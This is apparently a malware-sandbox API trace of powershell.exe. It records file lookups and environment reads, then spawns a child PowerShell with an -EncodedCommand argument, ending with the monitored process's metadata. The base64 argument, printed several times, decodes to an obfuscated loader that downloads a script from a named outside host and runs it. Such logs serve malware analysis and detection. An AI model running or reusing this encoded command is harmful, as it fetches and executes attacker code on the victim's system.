	[0604.590] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.590] SetErrorMode (uMode=0x1) returned 0x1
	[0604.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.590] SetErrorMode (uMode=0x1) returned 0x1
	[0604.591] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.591] SetErrorMode (uMode=0x1) returned 0x1
	[0604.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.591] SetErrorMode (uMode=0x1) returned 0x1
	[0604.591] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.591] SetErrorMode (uMode=0x1) returned 0x1
	[0604.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.592] SetErrorMode (uMode=0x1) returned 0x1
	[0604.592] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.592] SetErrorMode (uMode=0x1) returned 0x1
	[0604.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.593] SetErrorMode (uMode=0x1) returned 0x1
	[0604.593] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.593] SetErrorMode (uMode=0x1) returned 0x1
	[0604.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.593] SetErrorMode (uMode=0x1) returned 0x1
	[0604.593] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.594] SetErrorMode (uMode=0x1) returned 0x1
	[0604.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.594] SetErrorMode (uMode=0x1) returned 0x1
	[0604.594] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.594] SetErrorMode (uMode=0x1) returned 0x1
	[0604.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.595] SetErrorMode (uMode=0x1) returned 0x1
	[0604.595] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.595] SetErrorMode (uMode=0x1) returned 0x1
	[0604.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.595] SetErrorMode (uMode=0x1) returned 0x1
	[0604.595] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.596] SetErrorMode (uMode=0x1) returned 0x1
	[0604.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.596] SetErrorMode (uMode=0x1) returned 0x1
	[0604.596] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.597] SetErrorMode (uMode=0x1) returned 0x1
	[0604.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.597] SetErrorMode (uMode=0x1) returned 0x1
	[0604.597] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.597] SetErrorMode (uMode=0x1) returned 0x1
	[0604.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.598] SetErrorMode (uMode=0x1) returned 0x1
	[0604.598] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.598] SetErrorMode (uMode=0x1) returned 0x1
	[0604.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.598] SetErrorMode (uMode=0x1) returned 0x1
	[0604.598] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.599] SetErrorMode (uMode=0x1) returned 0x1
	[0604.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0604.599] SetErrorMode (uMode=0x1) returned 0x1
	[0604.599] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.599] SetErrorMode (uMode=0x1) returned 0x1
	[0604.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0604.600] SetErrorMode (uMode=0x1) returned 0x1
	[0604.600] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.600] SetErrorMode (uMode=0x1) returned 0x1
	[0604.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0604.600] SetErrorMode (uMode=0x1) returned 0x1
	[0604.600] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.601] SetErrorMode (uMode=0x1) returned 0x1
	[0604.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0604.601] SetErrorMode (uMode=0x1) returned 0x1
	[0604.601] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.601] SetErrorMode (uMode=0x1) returned 0x1
	[0604.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1cb1dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0604.602] SetErrorMode (uMode=0x1) returned 0x1
	[0604.602] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1cb1df20 | out: lpFindFileData=0x1cb1df20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1a4d20
	[0604.603] FindNextFileW (in: hFindFile=0x1a4d20, lpFindFileData=0x1cb1df30 | out: lpFindFileData=0x1cb1df30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0604.603] FindClose (in: hFindFile=0x1a4d20 | out: hFindFile=0x1a4d20) returned 1
	[0604.603] SetErrorMode (uMode=0x1) returned 0x1
	[0604.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1cb1e040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0604.604] SetErrorMode (uMode=0x1) returned 0x1
	[0604.605] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1cb1e250 | out: lpFileInformation=0x1cb1e250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0604.605] SetErrorMode (uMode=0x1) returned 0x1
	[0604.606] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0604.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.606] CoTaskMemFree (pv=0x19bfb0) 
	[0604.607] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0604.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.608] CoTaskMemFree (pv=0x19bfb0) 
	[0605.683] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0605.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.683] CoTaskMemFree (pv=0x19bfb0) 
	[0605.692] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0605.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.693] CoTaskMemFree (pv=0x19bfb0) 
	[0605.705] CoTaskMemAlloc (cb=0x3b) returned 0x1a1f30
	[0605.706] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1cb1e438, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1cb1e438) returned 0x4550
	[0606.700] CoTaskMemFree (pv=0x1a1f30) 
	[0606.709] GetConsoleWindow () returned 0x20240
	[0606.717] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0606.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.717] CoTaskMemFree (pv=0x19bfb0) 
	[0606.718] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0606.718] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0606.719] CoTaskMemFree (pv=0x19bfb0) 
	[0606.726] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0606.726] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0606.726] CoTaskMemFree (pv=0x19bfb0) 
	[0606.729] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1cb1e480 | out: pNumArgs=0x1cb1e480) returned 0x1b9801f0*=""
	[0606.730] lstrlenW (lpString="-EncodedCommand") returned 15
	[0606.732] CoTaskMemAlloc (cb=0x22) returned 0x1b98b2c0
	[0606.732] RtlMoveMemory (in: Destination=0x1b98b2c0, Source=0x1b980212, Length=0x20 | out: Destination=0x1b98b2c0) 
	[0606.732] CoTaskMemFree (pv=0x1b98b2c0) 
	[0606.732] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0606.732] CoTaskMemAlloc (cb=0x2f4) returned 0x15b890
	[0606.732] RtlMoveMemory (in: Destination=0x15b890, Source=0x1b980232, Length=0x2f2 | out: Destination=0x15b890) 
	[0606.733] CoTaskMemFree (pv=0x15b890) 
	[0607.700] LocalFree (hMem=0x1b9801f0) returned 0x0
	[0607.701] CoTaskMemAlloc (cb=0x804) returned 0x1b9910a0
	[0607.701] GetConsoleTitleW (in: lpConsoleTitle=0x1b9910a0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0607.701] CoTaskMemFree (pv=0x1b9910a0) 
	[0607.711] CoTaskMemAlloc (cb=0x38e) returned 0x1b9801f0
	[0607.711] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1cb1e3e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x35d1998 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x35d1998*(hProcess=0x18c, hThread=0x34c, dwProcessId=0x19b8, dwThreadId=0x19b4)) returned 1
	[0607.758] CoTaskMemFree (pv=0x1b9801f0) 
	[0607.759] CloseHandle (hObject=0x34c) returned 1
	[0607.759] CoTaskMemAlloc (cb=0x3b) returned 0x1a1f30
	[0607.759] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1cb1e488, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1cb1e488) returned 0x4550
	[0607.760] CoTaskMemFree (pv=0x1a1f30) 
	[0607.762] GetCurrentProcess () returned 0xffffffffffffffff
	[0607.762] GetCurrentProcess () returned 0xffffffffffffffff
	[0607.763] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1cb1e568, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1cb1e568*=0x34c) returned 1

Process:
	id = "41"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x9a58000"
	os_pid = "0xca0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
